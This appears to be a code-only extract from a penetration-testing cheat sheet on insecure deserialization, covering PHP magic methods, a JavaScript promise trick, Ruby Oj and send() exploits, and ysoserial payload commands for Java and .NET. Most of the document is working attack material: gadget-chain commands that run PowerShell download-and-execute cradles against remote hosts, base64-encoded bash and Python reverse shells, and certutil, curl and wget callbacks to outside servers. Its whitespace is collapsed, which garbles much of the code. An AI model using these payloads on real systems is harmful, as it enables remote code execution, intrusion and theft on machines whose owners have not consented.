<?phpclasstest {public $s ="This is a test";publicfunctiondisplaystring(){echo$this->s.'<br />';}publicfunction__toString(){echo'__toString method called';}publicfunction__construct(){echo"__construct method called";}publicfunction__destruct(){echo"__destruct method called";}publicfunction__wakeup(){echo"__wakeup method called";}publicfunction__sleep(){echo"__sleep method called";returnarray("s"); #The "s" makes references to the public attribute}}$o =newtest();$o->displaystring();$ser=serialize($o);echo $ser;$unser=unserialize($ser);$unser->displaystring();/*php > $o = new test();__construct method called__destruct method calledphp > $o->displaystring();This is a test<br />php > $ser=serialize($o);__sleep method calledphp > echo $ser;O:4:"test":1:{s:1:"s";s:14:"This is a test";}php > $unser=unserialize($ser);__wakeup method called__destruct method calledphp > $unser->displaystring();This is a test<br />*/?>
// If you can compromise p (returned object) to be a promise// it will be executed just because it's the return object of an async function:asyncfunctiontest_resolve() {constp=newPromise(resolve => {console.log('hello')resolve()})return p}asyncfunctiontest_then() {constp=newPromise(then => {console.log('hello')return1})return p}test_ressolve()test_then()//For more info: https://blog.huli.tw/2022/07/11/en/googlectf-2022-horkos-writeup/
# PoC to make the application perform a DNS reqjava-jarysoserial-master-SNAPSHOT.jarURLDNShttp://b7j40108s43ysmdpplgd3b7rdij87x.burpcollaborator.net>payload# PoC RCE in Windows# Pingjava-jarysoserial-master-SNAPSHOT.jarCommonsCollections5'cmd /c ping -n 5 127.0.0.1'>payload# Time, I noticed the response too longer when this was usedjava-jarysoserial-master-SNAPSHOT.jarCommonsCollections4"cmd /c timeout 5">payload# Create Filejava-jarysoserial-master-SNAPSHOT.jarCommonsCollections4"cmd /c echo pwned> C:\\\\Users\\\\username\\\\pwn">payload# DNS requestjava-jarysoserial-master-SNAPSHOT.jarCommonsCollections4"cmd /c nslookup jvikwa34jwgftvoxdz16jhpufllb90.burpcollaborator.net"# HTTP request (+DNS)java-jarysoserial-master-SNAPSHOT.jarCommonsCollections4"cmd /c certutil -urlcache -split -f http://j4ops7g6mi9w30verckjrk26txzqnf.burpcollaborator.net/a a"java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAYwBlADcAMABwAG8AbwB1ADAAaABlAGIAaQAzAHcAegB1AHMAMQB6ADIAYQBvADEAZgA3ADkAdgB5AC4AYgB1AHIAcABjAG8AbABsAGEAYgBvAHIAYQB0AG8AcgAuAG4AZQB0AC8AYQAnACkA"
## In the ast http request was encoded: IEX(New-Object Net.WebClient).downloadString('http://1ce70poou0hebi3wzus1z2ao1f79vy.burpcollaborator.net/a')## To encode something in Base64 for Windows PS from linux you can use: echo -n "<PAYLOAD>" | iconv --to-code UTF-16LE | base64 -w0# Reverse Shell## Encoded: IEX(New-Object Net.WebClient).downloadString('http://192.168.1.4:8989/powercat.ps1')java-jarysoserial-master-SNAPSHOT.jarCommonsCollections4"powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4ANAA6ADgAOQA4ADkALwBwAG8AdwBlAHIAYwBhAHQALgBwAHMAMQAnACkA"#PoC RCE in Linux# Pingjava-jarysoserial-master-SNAPSHOT.jarCommonsCollections4"ping -c 5 192.168.1.4">payload# Time## Using time in bash I didn't notice any difference in the timing of the response# Create filejava-jarysoserial-master-SNAPSHOT.jarCommonsCollections4"touch /tmp/pwn">payload# DNS requestjava-jarysoserial-master-SNAPSHOT.jarCommonsCollections4"dig ftcwoztjxibkocen6mkck0ehs8yymn.burpcollaborator.net"java-jarysoserial-master-SNAPSHOT.jarCommonsCollections4"nslookup ftcwoztjxibkocen6mkck0ehs8yymn.burpcollaborator.net"# HTTP request (+DNS)java-jarysoserial-master-SNAPSHOT.jarCommonsCollections4"curl ftcwoztjxibkocen6mkck0ehs8yymn.burpcollaborator.net">payloadjava-jarysoserial-master-SNAPSHOT.jarCommonsCollections4"wget ftcwoztjxibkocen6mkck0ehs8yymn.burpcollaborator.net"# Reverse shell## Encoded: bash -i >& /dev/tcp/127.0.0.1/4444 0>&1java-jarysoserial-master-SNAPSHOT.jarCommonsCollections4"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}"|base64-w0## Encoded: export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'java-jarysoserial-master-SNAPSHOT.jarCommonsCollections4"bash -c {echo,ZXhwb3J0IFJIT1NUPSIxMjcuMC4wLjEiO2V4cG9ydCBSUE9SVD0xMjM0NTtweXRob24gLWMgJ2ltcG9ydCBzeXMsc29ja2V0LG9zLHB0eTtzPXNvY2tldC5zb2NrZXQoKTtzLmNvbm5lY3QoKG9zLmdldGVudigiUkhPU1QiKSxpbnQob3MuZ2V0ZW52KCJSUE9SVCIpKSkpO1tvcy5kdXAyKHMuZmlsZW5vKCksZmQpIGZvciBmZCBpbiAoMCwxLDIpXTtwdHkuc3Bhd24oIi9iaW4vc2giKSc=}|{base64,-d}|{bash,-i}"# Base64 encode payload in base64base64-w0payload
#Send pingysoserial.exe-gObjectDataProvider-fJson.Net-c"ping -n 5 10.10.14.44"-obase64#Timing#I tried using ping and timeout but there wasn't any difference in the response timing from the web server#DNS/HTTP requestysoserial.exe-gObjectDataProvider-fJson.Net-c"nslookup sb7jkgm6onw1ymw0867mzm2r0i68ux.burpcollaborator.net"-obase64ysoserial.exe-gObjectDataProvider-fJson.Net-c"certutil -urlcache -split -f http://rfaqfsze4tl7hhkt5jtp53a1fsli97.burpcollaborator.net/a a"-obase64#Reverse shell#Create shell command in linuxecho-n"IEX(New-Object Net.WebClient).downloadString('http://10.10.14.44/shell.ps1')"|iconv-tUTF-16LE|base64-w0#Create exploit using the created B64 shellcodeysoserial.exe-gObjectDataProvider-fJson.Net-c"powershell -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADQANAAvAHMAaABlAGwAbAAuAHAAcwAxACcAKQA="-obase64
<Object>.send('<user_input>')# This code is taken from the original blog post# <Object> in this case is Repository## Find methods with those requirementsrepo =Repository.find(1) # get first reporepo_methods = [ # get names of all methods accessible by Repository objectrepo.public_methods(),repo.private_methods(),repo.protected_methods(),].flatten()repo_methods.length() # Initial number of methods => 5542## Filter by the arguments requirementscandidate_methods = repo_methods.select() do|method_name|[0,-1].include?(repo.method(method_name).arity())endcandidate_methods.length() # Final number of methods=> 3595
# Existing Ruby class inside the code of the appclassSimpleClassdefinitialize(cmd)@cmd = cmdenddefhashsystem(@cmd)endend# Exploitrequire'oj'simple =SimpleClass.new("open -a calculator") # command for macOSjson_payload =Oj.dump(simple)puts json_payload# Sink vulnerable inside the code accepting user input as json_payloadOj.load(json_payload)
